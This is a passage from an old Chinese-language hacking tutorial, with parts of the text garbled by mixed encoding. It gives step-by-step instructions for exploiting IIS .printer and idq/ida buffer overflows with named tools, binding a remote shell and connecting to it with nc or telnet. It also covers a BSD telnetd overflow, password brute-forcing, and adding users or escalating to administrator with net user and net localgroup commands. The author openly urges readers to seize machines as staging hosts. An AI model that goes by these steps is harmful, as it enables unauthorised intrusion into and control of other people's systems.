<BR><BR>具體原理我也不是很清楚，只能說個大概：當(dāng)我們向系統(tǒng)發(fā)出超出緩沖區(qū)大小的數(shù)據(jù)處理請求時，便會引發(fā)溢出，并彈出錯誤對話框，我們?？吹降摹胺欠ú僮鳌逼鋵嵰彩强赡苁怯捎谝绯?。而當(dāng)溢出時，eip發(fā)生錯誤，有匯編知識的朋友應(yīng)該記得，eip是控制執(zhí)行代碼的位置（順便問一下，有沒有會crack的高人，記得做我老師）這時加入一段惡性代碼，算好發(fā)生溢出時的eip值，這樣溢出時就會執(zhí)行惡性代碼而不是當(dāng)?shù)?。非法操作我們知道多的不得了，因此……溢出攻擊是非常強大的?<BR><BR>由于匯編對于我們來說較難掌握，加之對溢出的了解很有限，那么我們只能借助高手們的程序來黑了。 <BR><BR>具體方法： <BR><BR>1，準備iishack，本站有下載，該版本可以對多種系統(tǒng)進行攻擊。 <BR><BR>2，用x-scan或流光掃描一個有iis.printer漏洞的主機，然后就可以攻擊了。 <BR><BR>3，在命令行方式執(zhí)行iis5hack (主機ip) (端口號，默認80）（系統(tǒng)代號，具體可參考程序的說明） （ shell口） <BR><BR>例如：iis5hack 11.11.22.22 80 1 111(以為在111端口開一個shell) <BR><BR>4,用nc或telnet連上，nc/telnet 11.11.22.22 111,成功的話就可以控制機器了，加個用戶，做個代理…… <BR><BR>我的看法： <BR><BR>這算是一個比較有用的漏洞了，它能幫助我們?nèi)〉胹ystem權(quán)限，其實和admin差不了多少了，對于做一臺跳板是非常有利的，希望大家熟練掌握。 <BR><BR>三，idq/ida漏洞溢出攻擊 <BR><BR>這是時下很熱門的了，原理和上面的printer相似，目前我只找到了iis5的攻擊程序，在cshu里也可以找到的，我們準備的是snake的gui版本，很方便的。 <BR><BR>具體方法： <BR><BR>1，準備snakeiis溢出程序?？梢詮谋菊鞠螺d。 <BR><BR>2，ida/idq漏洞很多的，但win2k的服務(wù)器就不是那么普遍了，所以用你熟練的掃描器去找一打win2k的機器吧。 <BR><BR>3，程序的界面是很傻瓜的，把ip填入，選擇好類型，按下溢出按鈕，顯示shellcode發(fā)送完畢。 <BR><BR>4，telnet/nc到你設(shè)定好的端口，如果成功的話，會顯示目錄下的信息（因為默認shellcode是dir) <BR><BR>5，歡呼吧！再次溢出，別忘了改shellcode為你想要的代碼哦。 <BR><BR>6，重復(fù)4，很快一臺新鮮的win2k被你控制了！ <BR><BR>我的看法： <BR><BR>我很喜歡用這種攻擊，因為win2k的3389可以很方便的為我做事，省力地搞到一臺win2k，然后慢慢享用，爽到根尖細胞?。〈蠹覒?yīng)該掌握這項方法。 <BR><BR>四，*bsd telnetd溢出攻擊 <BR><BR>又是溢出，不過這個可是真正的熱點哦，最近紅盟等大型安全網(wǎng)站被黑就是因為這個！所以看看吧 <BR><BR>具體方法： <BR><BR>1，使用fbsdhack for win2k來攻擊，本站有下載的 <BR><BR>2，還是要找到這樣的主機，一般是xnix的，比較少的，用專門的掃描器吧，我會在不久放出來。 <BR><BR>3，等吧！這個漏洞要發(fā)送的信息很大，大約16mb,可怕吧，所以最好用高速肉雞 <BR><BR>4，有幸成功了，記得請我吃飯！ <BR><BR>我的看法： <BR><BR>這個漏洞的利用比較有難度，從找機器開始就是。但作為黑客愛好者，我們沒有理由去回避它！<BR><BR><BR><BR><BR>五，密碼暴力破解 <BR><BR>這是最最原始，也是最最基本的攻擊的方式了，利用字典文件或暴力模式，對密碼進行探測。費時費力，但若有經(jīng)驗的話，可以縮短這一過程。 <BR><BR>具體方法： <BR><BR>1，找一個破解器，有ftp,http,smtp,pop3,telnet等等類型。 <BR><BR>2，找到一臺相應(yīng)的主機。 <BR><BR>3，設(shè)定一番，上路吧！你可以睡覺，可以去machine(就是做作業(yè))，可以去泡妞……就是不要傻等。為什么呢？因為會傷視力的：）怎么倒了一片，起來起來！ <BR><BR>4，萬一成功了（之所以用這個詞，是因為成功率很低的）表明你運氣旺，趕緊下線，買彩票去吧 <BR><BR><BR>大家好，這幾天被cgi程序搞得頭昏腦脹，主要還是51的錯，什么破東西，那么多錯誤！現(xiàn)在只好暫時借人家的地方用。 <BR><BR>這是菜鳥操的最后第二節(jié)，說實話我還可以寫很多的，但是作業(yè)還欠了一大堆：（為什么我沒有滿舟的狗屎運？算了算了，我不合那種欺世盜名之輩一般見識，開始做操吧！ <BR><BR>不知道大家對unicode和溢出攻擊是不是熟練了？沒有的要加油哦！今天我們來談?wù)剻?quán)限的提升。 <BR><BR>在windows系統(tǒng)中，最高的權(quán)限掌握在administrators的手里，在xnix中稱為root,我們要完全掌握一臺機器，拿到admin是不可或缺的。 <BR><BR>首先說說最簡單的:system to admin <BR><BR>當(dāng)我們用溢出攻擊成功后，其實我們已經(jīng)拿到了system權(quán)限（具體看每種攻擊而可能有所不同）這時我們很容易拿到admin權(quán)限。首先看看一下命令： <BR><BR>net user 察看用戶表 net user username pass /add(添加密碼為pass的用戶username) <BR><BR>net localgroup 察看組 net localgroup guests cshu /add 把cshu用戶加入guests組 <BR><BR>net use \\ip\ipc$ "password" /user:username 這是遠程連接的命令 <BR><BR>假如我們溢出了11.11.22.22，那么這樣做吧！ <BR><BR>net user （看到了iusr_machinename的用戶了，它一般沒什么權(quán)限的）</DIV>